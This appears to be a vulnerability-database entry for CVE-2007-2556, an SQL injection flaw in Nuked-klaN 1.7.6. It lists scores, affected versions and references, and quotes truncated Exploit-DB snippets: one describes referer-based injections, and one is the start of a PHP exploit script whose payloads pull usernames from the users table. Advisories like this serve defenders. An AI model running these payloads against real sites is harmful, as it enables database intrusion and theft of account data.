CVE-2007-2556
Published: 2007-05-09
Priority P344 | high | 7.5 CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.45% (87.5th percentile)
SQL injection vulnerability in Nuked-klaN 1.7.6 allows remote attackers to execute arbitrary SQL commands via the X-Forwarded-For (X_FORWARDED_FOR) HTTP header, as demonstrated by a request to the /nk/ URI.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nuked-klan | nuked-klan | — | — |
No detection rules found.
Exploit-DB
Nuked-klaN 1.7.7 / SP4.4 - Multiple Vulnerabilities
exploitdb·2008-10-14
---
# URL: http://real.o-n.fr/
# Date: 14/10/2008
#
# Special thanks to Louis for reminding me I had to finish it =)
#
# VULNERABILITY DETAILS
# ---------------------
#
# Nuked-klaN suffers from a vulnerability due to HTTP_REFERER, which is not
# correctly filtered before being inserted in nuked_stats_visitor table.
#
# If HTTP headers are not addslashes()'d by PHP, it could lead to an INSERT
# SQL injection.
#
# In function view_referer() (visits.php), referers are extracted from the
# database to perform another SQL query, without being secured in between.
# This leads to a blind SQL injection.
#
# These injections are only possible if Nuked-klaN (NK) considers us as a
# new user, because else it won't touch the nuked_stats_visito
Exploit-DB
Nuked-klaN 1.7.6 - Remote Code Execution
exploitdb·2007-05-05
---
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.
$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url
$prx = ''; # proxy :
$pra = ''; # basic authentification
$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);
$config = array();
$config[] = 'nuked'; # table prefix
$config[] = 'nuked'; # cookie prefix
$config[] = 'ORDER by date LIMIT 1'; # sql conditions
$config[] = 'HAK'; # match, length ';
$request = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SE
No writeups or analysis indexed.
http://osvdb.org/36931
http://secunia.com/advisories/25165
http://securityreason.com/securityalert/2665
http://www.securityfocus.com/archive/1/467750/100/0/threaded
http://www.securityfocus.com/bid/23835
http://www.vupen.com/english/advisories/2007/1662
https://exchange.xforce.ibmcloud.com/vulnerabilities/34116
https://www.exploit-db.com/exploits/3858